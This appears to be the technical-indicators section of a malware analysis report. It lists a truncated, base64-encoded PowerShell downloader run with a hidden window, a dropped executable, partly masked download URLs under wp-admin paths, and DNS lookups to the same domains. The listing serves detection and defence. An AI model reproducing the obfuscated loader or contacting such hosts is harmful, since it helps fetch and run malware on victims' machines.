Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AGgAaQBiAD0AJwBoAGUAZQBqACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBjAGAAVQByAGAASQBUAFkAYABwAHIATwB0AE8AYwBPAGwAIgAgAD0AIAAnAHQAbABzADEAMgAsAC...
- %HOMEPATH%\997.exe
- http://de####acovid.com/wp-admin/dGzIMVvo/
- http://do###hai.com/wp-admin/Wq6Kdoisk1r4060453/
- http://ka###-up.com/wp-admin/CCzj96yk23/
- DNS ASK mi###.tri-comma.com
- DNS ASK de####acovid.com
- DNS ASK do###hai.com
- DNS ASK ag######ame.reviewshell.com
- DNS ASK ka###-up.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AGgAaQBiAD0AJwBoAGUAZQBqACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBjAGAAVQByAGAASQBUAFkAYABwAHIATwB0AE8AYwBPAGwAIgAgAD0AIAAnAHQAbABzADEAMgAsAC...' (with hidden window)